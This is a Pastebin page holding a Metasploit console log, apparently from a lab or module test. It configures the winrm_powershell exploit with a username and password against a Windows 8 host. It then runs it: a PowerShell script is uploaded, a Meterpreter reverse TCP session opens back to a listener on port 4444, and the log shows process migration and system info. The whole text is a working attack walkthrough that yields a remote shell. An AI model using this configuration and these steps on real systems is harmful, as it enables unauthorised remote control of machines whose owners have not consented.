Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(winrm_powershell) > show options
- Module options (exploit/windows/winrm/winrm_powershell):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- DOMAIN WORKSTATION yes The domain to use for Windows authentification
- PASSWORD omfg no A specific password to authenticate with
- Proxies no Use a proxy chain
- RHOST 10.6.255.158 yes The target address
- RPORT 5985 yes The target port
- URI /wsman yes The URI of the WinRM service
- USERNAME sinn3r no A specific username to authenticate as
- VHOST no HTTP server virtual host
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC thread yes Exit technique: seh, thread, process, none
- LHOST 10.6.255.84 yes The listen address
- LPORT 4444 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(winrm_powershell) > rexploit
- [*] Reloading module...
- [*] Started reverse handler on 10.6.255.84:4444
- [*] Attempting to set Execution Policy
- [*] Grabbing %TEMP%
- [*] uploading powershell script to C:\Users\sinn3r\AppData\Local\Temp\uUIpRDrz.ps1
- [*] Attempting to execute script...
- [*] Sending stage (752128 bytes) to 10.6.255.158
- [*] Meterpreter session 1 opened (10.6.255.84:4444 -> 10.6.255.158:49535) at 2012-10-31 17:09:00 -0500
- meterpreter >
- [*] Session ID 1 (10.6.255.84:4444 -> 10.6.255.158:49535) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
- [*] Current server process: powershell.exe (2844)
- [+] Migrating to 696
- [+] Successfully migrated to process
- meterpreter > sysinfo
- Computer : WIN-VFQHRRTCA39
- OS : Windows 8 (Build 9200).
- Architecture : x86
- System Language : en_US
- Meterpreter : x86/win32
- meterpreter >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement